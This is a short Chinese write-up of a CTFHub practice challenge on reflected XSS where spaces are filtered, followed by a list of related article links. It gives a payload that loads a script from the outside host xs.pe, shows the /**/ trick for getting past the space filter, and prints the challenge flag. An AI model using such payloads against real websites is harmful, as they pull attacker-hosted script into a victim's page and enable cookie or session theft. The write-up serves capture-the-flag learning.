CTFHUB技能树之XSS——过滤空格

南暮思鸢2024-10-24 22:59

开启靶场,打开链接:

看上去是GET传参,有点像反射型的那题

在第一个输入框中输入:

<sCRiPt sRC=//xs.pe/6b6></sCrIpT>

没什么反应,右键查看源代码:

发现<sCRiPt sRC=//xs.pe/6b6></sCrIpT>中的sCRiPt和sRC之间的空格消失了,对空格做了过滤处理

用/**/绕过:

<sCRiPt/**/sRC=//xs.pe/6b6></sCrIpT>

提交之后再复制地址栏中的URL,粘贴到第二个输入框中提交:

成功得到flag:

ctfhub{5f10e129d697165a8083b5be}

相关推荐
lichenyang4538 小时前
Docker 学习笔记(一):为什么需要镜像、容器和仓库?
前端
kyriewen8 小时前
别再对着 TypeScript 报错发呆了:我把 10 个最常见的红色波浪线翻译成了人话
前端·javascript·typescript
IT_陈寒8 小时前
SpringBoot自动配置的坑,我的API突然就404了
前端·人工智能·后端
奇奇怪怪的9 小时前
Embedding 模型 10+ 横向评测
前端
陈广亮9 小时前
Monorepo 从 0 到 1 实操指南 2026 版:pnpm catalogs + Turborepo 2.x + changesets 全链路
前端
子兮曰9 小时前
OpenMontage 深度解剖:你的 AI 编程助手,其实是个视频工作室
前端·后端·ai编程
敲代码的鱼9 小时前
PDF 预览与签名批注写回 支持安卓 iOS 鸿蒙 UTS插件
android·前端·ios
子兮曰9 小时前
前端工具链的「Rust 化」:一场没有赢家的军备竞赛?
前端·后端·rust
Hyyy10 小时前
Function Calling / Tool Use的原理和实现模式
前端·llm·ai编程
热门推荐
012026年6月AI大模型全景报告:GPT-5.6、Claude Opus 4.8、Gemini 3.5,中美AI三足鼎立谁主沉浮?022026年6月AI行业全景:从百模大战到Agent元年,这30天发生了什么?032026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf04飞书长连接_事件订阅(接收消息,审批任务状态变更)05Trae国际版与国内版深度测评:AI原生IDE的双生花06GitHub 镜像站点07【AI】2026 年具身智能模型和世界模型总结082026年AI架构实战:彻底解决OpenAI接口超时与封号,Python调用GPT-5.2/Sora2企业级架构详解(附源码+压测报告)09Claude Code、Codex、Cursor三分天下:2026年AI编程Agent生态全景剖析102026 AI 编程工具终极实战指南:Cursor vs Claude Code vs Copilot,开发者该怎么选?